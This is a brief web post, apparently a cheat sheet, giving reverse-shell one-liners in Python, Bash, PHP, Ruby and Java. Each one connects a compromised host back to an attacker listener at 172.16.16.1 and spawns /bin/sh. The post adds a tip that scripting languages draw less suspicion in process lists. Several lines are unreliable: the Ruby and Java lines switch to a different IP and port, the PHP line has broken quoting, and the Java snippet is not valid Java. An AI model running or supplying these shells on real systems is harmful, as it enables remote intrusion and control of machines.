Last Updated:

Reverse Shells: scripting style

Reverse Shells: scripting style

One of the biggest advantages to using a scripting language to spawn the reverse shell, is it often isn't very suspicious when viewing the running processes alone. Often you'll find hosts already have several scripting languages installed.

In these scenarios, your listening IP is 172.16.16.1 and your listening port is 1234.

Python Reverse Shell:

python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("172.16.16.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

Bash Reverse Shell:

This is probably the most common reverse shell used.

bash -i >& /dev/tcp/172.16.16.1/1234 0>&1

PHP Reverse Shell:

php -r '$sock=fsockopen("172.16.16.1",1234);exec("/bin/sh" -i <&3 >&3 2>&3");'

Ruby Reverse Shell:

ruby -rsocket -e'f=TCPSocket.open("172.16.16.169",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell:

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.16.169/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

Comments